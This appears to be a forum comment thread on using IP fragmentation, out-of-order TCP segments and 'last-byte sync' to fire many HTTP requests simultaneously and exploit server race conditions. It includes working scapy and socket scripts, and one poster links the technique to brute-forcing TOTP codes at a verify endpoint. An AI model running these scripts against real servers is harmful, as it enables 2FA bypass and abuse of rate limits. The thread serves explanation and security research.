It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to reassemble packets of up to 1500 bytes, so sending a 65 KB TCP segment is quite likely to just result in dropped packets.
On the other hand, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices along the path are configured for them. Additionally, IPv6 supports packets of up to nearly 4 GiB (so-called "jumbograms", signalled via a Hop-by-Hop extension header option), though you would be hard pressed to find any network that uses this feature.
> On the other hand, the 1500 limit is not a hard limit, and depends entirely on your link.
The two concepts are orthogonal. You can have a 1280-byte link MTU on a device that happily reassembles nine fragments into a 9000-byte payload. You can also have another device with a 9000-byte link MTU that refuses to reassemble two 1280-byte fragments into a single ~2500-byte packet, simply because it doesn't have to. Both devices are IPv6 compliant.
Well, I suppose there is one causal relationship between the link-layer MTU and IPv6 fragmentation: how much bigger than 1280 bytes the individual fragments can be.
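To make the fragmentation side concrete, here's a minimal sketch of what those fragments look like when crafted by hand with scapy (the destination address is a documentation placeholder, and sending raw packets needs root):

    # Sketch: hand-crafting IPv6 fragments with scapy (pip install scapy).
    from scapy.all import IPv6, IPv6ExtHdrFragment, UDP, Raw, fragment6, send

    # A ~4000-byte datagram, well over the 1500-byte reassembly minimum.
    pkt = (IPv6(dst="2001:db8::1")        # placeholder address
           / IPv6ExtHdrFragment()         # fragment6() needs this header present
           / UDP(sport=12345, dport=9)
           / Raw(b"A" * 4000))

    # fragSize is the on-wire size of each fragment; 1280 is the IPv6
    # minimum link MTU, so these fragments fit on any compliant link.
    frags = fragment6(pkt, 1280)
    send(frags)

Whether the receiver reassembles this at all is exactly the open question above: 4000 bytes is past the 1500-byte reassembled size it's required to support.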
Indeed. If the attack works by exploiting the server's (reliable) TCP reordering, then why also bother with (unreliable) IP fragmentation? Just send a larger number of out-of-order TCP packets, surely?
Two techniques, even: more requests processed at once, and a starting point the user can control very precisely (adjusted for bandwidth).
One helps with race conditions in the server; the other helps when racing third parties' requests. Sending one highly efficient "go" packet for many HTTP requests is sure to ruin the fun for everyone else waiting for some pre-announced concert-ticket or GPU sale to open.
If the website's accounting is merely "eventually consistent" across threads/servers and you can fire many (large) requests at a precise point in time (determined by one small packet), the two techniques work in tandem: you could have one of your posts land on an ID with repeating digits (such as https://news.ycombinator.com/item?id=42000000) without ever seeing "Sorry, we're not able to serve your requests this quickly."
I think it's ultimately about bypassing TOTP 2FA by exploiting a race condition in the authentication-failure backoff timer to submit thousands of possible codes simultaneously. The technique abuses the TCP stack and IP fragmentation to load the server up with as much data as possible before hitting it with a "go" packet that completes the fragments at the head of the blocked queue and spills the entire buffered contents into the webserver before a single RTT has elapsed.
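For illustration, here's a rough scapy sketch of the TCP-level variant of that "go" packet idea: every byte of the request except the first is sent ahead of time as out-of-order data, and one final tiny packet releases it all at once. Addresses are placeholders, it needs root, and the kernel's own RSTs must be firewalled off (e.g. an iptables rule dropping outgoing RSTs to the target), or the kernel will tear down the hand-rolled connection:

    # Sketch: out-of-order TCP segments plus a final "go" packet (scapy).
    from scapy.all import IP, TCP, send, sr1
    import random

    dst, dport = "203.0.113.10", 80              # placeholder target
    sport = random.randint(1025, 65000)

    # Manual three-way handshake; the kernel's TCP stack is bypassed entirely.
    synack = sr1(IP(dst=dst) / TCP(sport=sport, dport=dport,
                                   flags="S", seq=1000), timeout=2)
    assert synack is not None, "no SYN-ACK received"
    send(IP(dst=dst) / TCP(sport=sport, dport=dport, flags="A",
                           seq=1001, ack=synack.seq + 1))

    payload = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
    head, tail = payload[:1], payload[1:]

    # Everything except the first byte: the server's TCP stack buffers
    # this as out-of-order data and delivers nothing to the application.
    send(IP(dst=dst) / TCP(sport=sport, dport=dport, flags="PA",
                           seq=1002, ack=synack.seq + 1) / tail)

    # The "go" packet: the missing first byte completes the sequence and
    # the whole buffered request spills into the server at once.
    send(IP(dst=dst) / TCP(sport=sport, dport=dport, flags="PA",
                           seq=1001, ack=synack.seq + 1) / head)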
Many real-world web applications “shockingly” don’t guarantee ACID-style transactional state updates, and thus are vulnerable to race conditions.
Suppose (for instance) that the application tier caches user session information by some internal, reused ID.
If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.
But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.
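A contrived sketch of that failure mode, with all names made up for illustration: an in-memory store where the recycled ID is handed out before the new session's data is swapped in.

    # Sketch: session-ID reuse where the ID is assigned before the new
    # session's data is populated, leaving a window for stale reads.
    import threading, time

    sessions = {17: {"user": "alice"}}   # stale data from the ID's old owner
    free_ids = [17]                      # that ID is about to be recycled

    def create_session(user):
        sid = free_ids.pop()             # step 1: ID reserved
        time.sleep(0.001)                # the "few microseconds" window
        sessions[sid] = {"user": user}   # step 2: data populated
        return sid

    def racing_request(sid):
        return sessions.get(sid)         # may observe the previous owner

    t = threading.Thread(target=create_session, args=("bob",))
    t.start()
    time.sleep(0.0005)                   # land inside the window
    print(racing_request(17))            # likely {'user': 'alice'} - wrong user
    t.join()

The transactional version collapses steps 1 and 2 into a single atomic operation, closing the window.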
I assume this would be less useful with HTTP/1.1, since each synchronized request would need its own socket, running into firewall limits on SYN/SYN-ACK rates and/or on concurrent connections from the same IP.
In some respects this abuses the exact reason we got HTTP/3 to replace HTTP/2: it's deliberate head-of-line (HoL) blocking.
You can pipeline requests on HTTP/1.1, but most servers handle one request at a time and won't read the next request until the current one's response is finished. (And mainstream browsers don't typically issue pipelined requests over HTTP/1.1, IIRC.)
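Pipelining is easy to demonstrate with a bare socket: write two requests back to back, then read. Whether they're processed concurrently or strictly in turn is up to the server (example.com as a stand-in host):

    # Sketch: HTTP/1.1 pipelining - two requests on one socket before
    # reading any response. Both responses come back in order.
    import socket

    host = "example.com"                 # stand-in host
    s = socket.create_connection((host, 80))
    req = f"GET / HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    s.sendall(req + req)                 # second request pipelined behind the first

    data = b""
    while len(data) < 4096:
        chunk = s.recv(4096)
        if not chunk:
            break
        data += chunk
    print(data.decode(errors="replace")[:600])
    s.close()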
If you have a connection per request and you need 1000 requests to be 'simultaneous', you've got to get a 1000-packet burst to arrive closely packed, and that's a lot harder than this method (or the similar method suggested in the comments: sending unfragmented TCP packets out of order, so that when the first packet of the sequence is received, the rest are already there).
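One workaround for that burst problem is to apply the "go" packet idea upthread per connection: open N sockets, send every request minus its final byte, then release all the final bytes together. A sketch, with a placeholder target:

    # Sketch: "last byte sync" across N HTTP/1.1 connections. Each request
    # is sent minus its last byte; the final bytes then go out in one burst.
    import socket

    HOST, PORT, N = "192.0.2.10", 80, 20   # placeholder target
    body = "code=123456"
    req = (f"POST /verify HTTP/1.1\r\nHost: {HOST}\r\n"
           f"Content-Type: application/x-www-form-urlencoded\r\n"
           f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n{body}"
           ).encode()

    socks = []
    for _ in range(N):
        s = socket.create_connection((HOST, PORT))
        # TCP_NODELAY keeps the tiny "go" writes from being held by Nagle.
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        s.sendall(req[:-1])              # everything except the last byte
        socks.append(s)

    # The synchronized "go": all N requests complete within one tight loop.
    for s in socks:
        s.sendall(req[-1:])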
The same paper is also referenced by James Kettle in his research.